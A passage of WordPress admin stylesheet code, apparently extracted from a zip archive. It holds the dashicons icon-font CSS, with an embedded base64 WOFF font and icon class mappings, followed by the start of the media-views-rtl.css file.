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") format("woff"),url("../fonts/dashicons.ttf?99ac726223c749443b642ce33df8b800") format("truetype");font-weight:400;font-style:normal}.dashicons,.dashicons-before:before{font-family:dashicons;display:inline-block;line-height:1;font-weight:400;font-style:normal;text-decoration:inherit;text-transform:none;text-rendering:auto;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale;width:20px;height:20px;font-size:20px;vertical-align:top;text-align:center;transition:color .1s ease-in}.dashicons-admin-appearance:before{content:"\f100"}.dashicons-admin-collapse:before{content:"\f148"}.dashicons-admin-comments:before{content:"\f101"}.dashicons-admin-customizer:before{content:"\f540"}.dashicons-admin-generic:before{content:"\f111"}.dashicons-admin-home:before{content:"\f102"}.dashicons-admin-links:before{content:"\f103"}.dashicons-admin-media:before{content:"\f104"}.dashicons-admin-multisite:before{content:"\f541"}.dashicons-admin-network:before{content:"\f112"}.dashicons-admin-page:before{content:"\f105"}.dashicons-admin-plugins:before{content:"\f106"}.dashicons-admin-post:before{content:"\f109"}.dashicons-admin-settings:before{content:"\f108"}.dashicons-admin-site-alt:before{content:"\f11d"}.dashicons-admin-site-alt2:before{content:"\f11e"}.dashicons-admin-site-alt3:before{content:"\f11f"}.dashicons-admin-site:before{content:"\f319"}.dashicons-admin-tools:before{content:"\f107"}.dashicons-admin-users:before{content:"\f110"}.dashicons-airplane:before{content:"\f15f"}.dashicons-album:before{content:"\f514"}.dashicons-align-center:before{content:"\f134"}.dashicons-align-full-width:before{content:"\f114"}.dashicons-align-left:before{content:"\f135"}.dashicons-align-none:before{content:"\f138"}.dashicons-align-pull-left:before{content:"\f10a"}.dashicons-align-pull-right:before{content:"\f10b"}.dashicons-align-right:before{content:"\f136"}.dashicons-align-wide:before{content:"\f11b"}.dashicons-amazon:before{content:"\f162"}.dashicons-analytics:before{content:"\f183"}.dashicons-archive:before{content:"\f480"}.dashicons-arrow-down-alt:before{content:"\f346"}.dashicons-arrow-down-alt2:before{content:"\f347"}.dashicons-arrow-down:before{content:"\f140"}.dashicons-arrow-left-alt:before{content:"\f340"}.dashicons-arrow-left-alt2:before{content:"\f341"}.dashicons-arrow-left:before{content:"\f141"}.dashicons-arrow-right-alt:before{content:"\f344"}.dashicons-arrow-right-alt2:before{content:"\f345"}.dashicons-arrow-right:before{content:"\f139"}.dashicons-arrow-up-alt:before{content:"\f342"}.dashicons-arrow-up-alt2:before{content:"\f343"}.dashicons-arrow-up-duplicate:before{content:"\f143"}.dashicons-arrow-up:before{content:"\f142"}.dashicons-art:before{content:"\f309"}.dashicons-awards:before{content:"\f313"}.dashicons-backup:before{content:"\f321"}.dashicons-bank:before{content:"\f16a"}.dashicons-beer:before{content:"\f16c"}.dashicons-bell:before{content:"\f16d"}.dashicons-block-default:before{content:"\f12b"}.dashicons-book-alt:before{content:"\f331"}.dashicons-book:before{content:"\f330"}.dashicons-buddicons-activity:before{content:"\f452"}.dashicons-buddicons-bbpress-logo:before{content:"\f477"}.dashicons-buddicons-buddypress-logo:before{content:"\f448"}.dashicons-buddicons-community:before{content:"\f453"}.dashicons-buddicons-forums:before{content:"\f449"}.dashicons-buddicons-friends:before{content:"\f454"}.dashicons-buddicons-groups:before{content:"\f456"}.dashicons-buddicons-pm:before{content:"\f457"}.dashicons-buddicons-replies:before{content:"\f451"}.dashicons-buddicons-topics:before{content:"\f450"}.dashicons-buddicons-tracking:before{content:"\f455"}.dashicons-building:before{content:"\f512"}.dashicons-businessman:before{content:"\f338"}.dashicons-businessperson:before{content:"\f12e"}.dashicons-businesswoman:before{content:"\f12f"}.dashicons-button:before{content:"\f11a"}.dashicons-calculator:before{content:"\f16e"}.dashicons-calendar-alt:before{content:"\f508"}.dashicons-calendar:before{content:"\f145"}.dashicons-camera-alt:before{content:"\f129"}.dashicons-camera:before{content:"\f306"}.dashicons-car:before{content:"\f16b"}.dashicons-carrot:before{content:"\f511"}.dashicons-cart:before{content:"\f174"}.dashicons-category:before{content:"\f318"}.dashicons-chart-area:before{content:"\f239"}.dashicons-chart-bar:before{content:"\f185"}.dashicons-chart-line:before{content:"\f238"}.dashicons-chart-pie:before{content:"\f184"}.dashicons-clipboard:before{content:"\f481"}.dashicons-clock:before{content:"\f469"}.dashicons-cloud-saved:before{content:"\f137"}.dashicons-cloud-upload:before{content:"\f13b"}.dashicons-cloud:before{content:"\f176"}.dashicons-code-standards:before{content:"\f13a"}.dashicons-coffee:before{content:"\f16f"}.dashicons-color-picker:before{content:"\f131"}.dashicons-columns:before{content:"\f13c"}.dashicons-controls-back:before{content:"\f518"}.dashicons-controls-forward:before{content:"\f519"}.dashicons-controls-pause:before{content:"\f523"}.dashicons-controls-play:before{content:"\f522"}.dashicons-controls-repeat:before{content:"\f515"}.dashicons-controls-skipback:before{content:"\f516"}.dashicons-controls-skipforward:before{content:"\f517"}.dashicons-controls-volumeoff:before{content:"\f520"}.dashicons-controls-volumeon:before{content:"\f521"}.dashicons-cover-image:before{content:"\f13d"}.dashicons-dashboard:before{content:"\f226"}.dashicons-database-add:before{content:"\f170"}.dashicons-database-export:before{content:"\f17a"}.dashicons-database-import:before{content:"\f17b"}.dashicons-database-remove:before{content:"\f17c"}.dashicons-database-view:before{content:"\f17d"}.dashicons-database:before{content:"\f17e"}.dashicons-desktop:before{content:"\f472"}.dashicons-dismiss:before{content:"\f153"}.dashicons-download:before{content:"\f316"}.dashicons-drumstick:before{content:"\f17f"}.dashicons-edit-large:before{content:"\f327"}.dashicons-edit-page:before{content:"\f186"}.dashicons-edit:before{content:"\f464"}.dashicons-editor-aligncenter:before{content:"\f207"}.dashicons-editor-alignleft:before{content:"\f206"}.dashicons-editor-alignright:before{content:"\f208"}.dashicons-editor-bold:before{content:"\f200"}.dashicons-editor-break:before{content:"\f474"}.dashicons-editor-code-duplicate:before{content:"\f494"}.dashicons-editor-code:before{content:"\f475"}.dashicons-editor-contract:before{content:"\f506"}.dashicons-editor-customchar:before{content:"\f220"}.dashicons-editor-expand:before{content:"\f211"}.dashicons-editor-help:before{content:"\f223"}.dashicons-editor-indent:before{content:"\f222"}.dashicons-editor-insertmore:before{content:"\f209"}.dashicons-editor-italic:before{content:"\f201"}.dashicons-editor-justify:before{content:"\f214"}.dashicons-editor-kitchensink:before{content:"\f212"}.dashicons-editor-ltr:before{content:"\f10c"}.dashicons-editor-ol-rtl:before{content:"\f12c"}.dashicons-editor-ol:before{content:"\f204"}.dashicons-editor-outdent:before{content:"\f221"}.dashicons-editor-paragraph:before{content:"\f476"}.dashicons-editor-paste-text:before{content:"\f217"}.dashicons-editor-paste-word:before{content:"\f216"}.dashicons-editor-quote:before{content:"\f205"}.dashicons-editor-removeformatting:before{content:"\f218"}.dashicons-editor-rtl:before{content:"\f320"}.dashicons-editor-spellcheck:before{content:"\f210"}.dashicons-editor-strikethrough:before{content:"\f224"}.dashicons-editor-table:before{content:"\f535"}.dashicons-editor-textcolor:before{content:"\f215"}.dashicons-editor-ul:before{content:"\f203"}.dashicons-editor-underline:before{content:"\f213"}.dashicons-editor-unlink:before{content:"\f225"}.dashicons-editor-video:before{content:"\f219"}.dashicons-ellipsis:before{content:"\f11c"}.dashicons-email-alt:before{content:"\f466"}.dashicons-email-alt2:before{content:"\f467"}.dashicons-email:before{content:"\f465"}.dashicons-embed-audio:before{content:"\f13e"}.dashicons-embed-generic:before{content:"\f13f"}.dashicons-embed-photo:before{content:"\f144"}.dashicons-embed-post:before{content:"\f146"}.dashicons-embed-video:before{content:"\f149"}.dashicons-excerpt-view:before{content:"\f164"}.dashicons-exit:before{content:"\f14a"}.dashicons-external:before{content:"\f504"}.dashicons-facebook-alt:before{content:"\f305"}.dashicons-facebook:before{content:"\f304"}.dashicons-feedback:before{content:"\f175"}.dashicons-filter:before{content:"\f536"}.dashicons-flag:before{content:"\f227"}.dashicons-food:before{content:"\f187"}.dashicons-format-aside:before{content:"\f123"}.dashicons-format-audio:before{content:"\f127"}.dashicons-format-chat:before{content:"\f125"}.dashicons-format-gallery:before{content:"\f161"}.dashicons-format-image:before{content:"\f128"}.dashicons-format-quote:before{content:"\f122"}.dashicons-format-status:before{content:"\f130"}.dashicons-format-video:before{content:"\f126"}.dashicons-forms:before{content:"\f314"}.dashicons-fullscreen-alt:before{content:"\f188"}.dashicons-fullscreen-exit-alt:before{content:"\f189"}.dashicons-games:before{content:"\f18a"}.dashicons-google:before{content:"\f18b"}.dashicons-googleplus:before{content:"\f462"}.dashicons-grid-view:before{content:"\f509"}.dashicons-groups:before{content:"\f307"}.dashicons-hammer:before{content:"\f308"}.dashicons-heading:before{content:"\f10e"}.dashicons-heart:before{content:"\f487"}.dashicons-hidden:before{content:"\f530"}.dashicons-hourglass:before{content:"\f18c"}.dashicons-html:before{content:"\f14b"}.dashicons-id-alt:before{content:"\f337"}.dashicons-id:before{content:"\f336"}.dashicons-image-crop:before{content:"\f165"}.dashicons-image-filter:before{content:"\f533"}.dashicons-image-flip-horizontal:before{content:"\f169"}.dashicons-image-flip-vertical:before{content:"\f168"}.dashicons-image-rotate-left:before{content:"\f166"}.dashicons-image-rotate-right:before{content:"\f167"}.dashicons-image-rotate:before{content:"\f531"}.dashicons-images-alt:before{content:"\f232"}.dashicons-images-alt2:before{content:"\f233"}.dashicons-index-card:before{content:"\f510"}.dashicons-info-outline:before{content:"\f14c"}.dashicons-info:before{content:"\f348"}.dashicons-insert-after:before{content:"\f14d"}.dashicons-insert-before:before{content:"\f14e"}.dashicons-insert:before{content:"\f10f"}.dashicons-instagram:before{content:"\f12d"}.dashicons-laptop:before{content:"\f547"}.dashicons-layout:before{content:"\f538"}.dashicons-leftright:before{content:"\f229"}.dashicons-lightbulb:before{content:"\f339"}.dashicons-linkedin:before{content:"\f18d"}.dashicons-list-view:before{content:"\f163"}.dashicons-location-alt:before{content:"\f231"}.dashicons-location:before{content:"\f230"}.dashicons-lock-duplicate:before{content:"\f315"}.dashicons-lock:before{content:"\f160"}.dashicons-marker:before{content:"\f159"}.dashicons-media-archive:before{content:"\f501"}.dashicons-media-audio:before{content:"\f500"}.dashicons-media-code:before{content:"\f499"}.dashicons-media-default:before{content:"\f498"}.dashicons-media-document:before{content:"\f497"}.dashicons-media-interactive:before{content:"\f496"}.dashicons-media-spreadsheet:before{content:"\f495"}.dashicons-media-text:before{content:"\f491"}.dashicons-media-video:before{content:"\f490"}.dashicons-megaphone:before{content:"\f488"}.dashicons-menu-alt:before{content:"\f228"}.dashicons-menu-alt2:before{content:"\f329"}.dashicons-menu-alt3:before{content:"\f349"}.dashicons-menu:before{content:"\f333"}.dashicons-microphone:before{content:"\f482"}.dashicons-migrate:before{content:"\f310"}.dashicons-minus:before{content:"\f460"}.dashicons-money-alt:before{content:"\f18e"}.dashicons-money:before{content:"\f526"}.dashicons-move:before{content:"\f545"}.dashicons-nametag:before{content:"\f484"}.dashicons-networking:before{content:"\f325"}.dashicons-no-alt:before{content:"\f335"}.dashicons-no:before{content:"\f158"}.dashicons-open-folder:before{content:"\f18f"}.dashicons-palmtree:before{content:"\f527"}.dashicons-paperclip:before{content:"\f546"}.dashicons-pdf:before{content:"\f190"}.dashicons-performance:before{content:"\f311"}.dashicons-pets:before{content:"\f191"}.dashicons-phone:before{content:"\f525"}.dashicons-pinterest:before{content:"\f192"}.dashicons-playlist-audio:before{content:"\f492"}.dashicons-playlist-video:before{content:"\f493"}.dashicons-plugins-checked:before{content:"\f485"}.dashicons-plus-alt:before{content:"\f502"}.dashicons-plus-alt2:before{content:"\f543"}.dashicons-plus:before{content:"\f132"}.dashicons-podio:before{content:"\f19c"}.dashicons-portfolio:before{content:"\f322"}.dashicons-post-status:before{content:"\f173"}.dashicons-pressthis:before{content:"\f157"}.dashicons-printer:before{content:"\f193"}.dashicons-privacy:before{content:"\f194"}.dashicons-products:before{content:"\f312"}.dashicons-randomize:before{content:"\f503"}.dashicons-reddit:before{content:"\f195"}.dashicons-redo:before{content:"\f172"}.dashicons-remove:before{content:"\f14f"}.dashicons-rest-api:before{content:"\f124"}.dashicons-rss:before{content:"\f303"}.dashicons-saved:before{content:"\f15e"}.dashicons-schedule:before{content:"\f489"}.dashicons-screenoptions:before{content:"\f180"}.dashicons-search:before{content:"\f179"}.dashicons-share-alt:before{content:"\f240"}.dashicons-share-alt2:before{content:"\f242"}.dashicons-share:before{content:"\f237"}.dashicons-shield-alt:before{content:"\f334"}.dashicons-shield:before{content:"\f332"}.dashicons-shortcode:before{content:"\f150"}.dashicons-slides:before{content:"\f181"}.dashicons-smartphone:before{content:"\f470"}.dashicons-smiley:before{content:"\f328"}.dashicons-sort:before{content:"\f156"}.dashicons-sos:before{content:"\f468"}.dashicons-spotify:before{content:"\f196"}.dashicons-star-empty:before{content:"\f154"}.dashicons-star-filled:before{content:"\f155"}.dashicons-star-half:before{content:"\f459"}.dashicons-sticky:before{content:"\f537"}.dashicons-store:before{content:"\f513"}.dashicons-superhero-alt:before{content:"\f197"}.dashicons-superhero:before{content:"\f198"}.dashicons-table-col-after:before{content:"\f151"}.dashicons-table-col-before:before{content:"\f152"}.dashicons-table-col-delete:before{content:"\f15a"}.dashicons-table-row-after:before{content:"\f15b"}.dashicons-table-row-before:before{content:"\f15c"}.dashicons-table-row-delete:before{content:"\f15d"}.dashicons-tablet:before{content:"\f471"}.dashicons-tag:before{content:"\f323"}.dashicons-tagcloud:before{content:"\f479"}.dashicons-testimonial:before{content:"\f473"}.dashicons-text-page:before{content:"\f121"}.dashicons-text:before{content:"\f478"}.dashicons-thumbs-down:before{content:"\f542"}.dashicons-thumbs-up:before{content:"\f529"}.dashicons-tickets-alt:before{content:"\f524"}.dashicons-tickets:before{content:"\f486"}.dashicons-tide:before{content:"\f10d"}.dashicons-translation:before{content:"\f326"}.dashicons-trash:before{content:"\f182"}.dashicons-twitch:before{content:"\f199"}.dashicons-twitter-alt:before{content:"\f302"}.dashicons-twitter:before{content:"\f301"}.dashicons-undo:before{content:"\f171"}.dashicons-universal-access-alt:before{content:"\f507"}.dashicons-universal-access:before{content:"\f483"}.dashicons-unlock:before{content:"\f528"}.dashicons-update-alt:before{content:"\f113"}.dashicons-update:before{content:"\f463"}.dashicons-upload:before{content:"\f317"}.dashicons-vault:before{content:"\f178"}.dashicons-video-alt:before{content:"\f234"}.dashicons-video-alt2:before{content:"\f235"}.dashicons-video-alt3:before{content:"\f236"}.dashicons-visibility:before{content:"\f177"}.dashicons-warning:before{content:"\f534"}.dashicons-welcome-add-page:before{content:"\f133"}.dashicons-welcome-comments:before{content:"\f117"}.dashicons-welcome-learn-more:before{content:"\f118"}.dashicons-welcome-view-site:before{content:"\f115"}.dashicons-welcome-widgets-menus:before{content:"\f116"}.dashicons-welcome-write-blog:before{content:"\f119"}.dashicons-whatsapp:before{content:"\f19a"}.dashicons-wordpress-alt:before{content:"\f324"}.dashicons-wordpress:before{content:"\f120"}.dashicons-xing:before{content:"\f19d"}.dashicons-yes-alt:before{content:"\f12a"}.dashicons-yes:before{content:"\f147"}.dashicons-youtube:before{content:"\f19b"}.dashicons-editor-distractionfree:before{content:"\f211"}.dashicons-exerpt-view:before{content:"\f164"}.dashicons-format-links:before{content:"\f103"}.dashicons-format-standard:before{content:"\f109"}.dashicons-post-trash:before{content:"\f182"}.dashicons-share1:before{content:"\f237"}.dashicons-welcome-edit-page:before{content:"\f119"}PK!imedia-views-rtl.cssnuȯ/*! This file is auto-generated */ /** * Base Styles */ .media-modal * { box-sizing: content-box; } .media-modal input, .media-modal select, .media-modal textarea { box-sizing: border-box; } .media-modal, .media-frame { font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif; font-size: 12px; -webkit-overflow-scrolling: touch; } .media-modal legend { padding: 0; font-size: 13px; } .media-modal label { font-size: 13px; } .media-modal .legend-inline { position: absolute; transform: translate(100%, 50%); margin-right: -1%; line-height: 1.2; } .media-frame a { border-bottom: none; color: #2271b1; } .media-frame a:hover, .media-frame a:active { color: 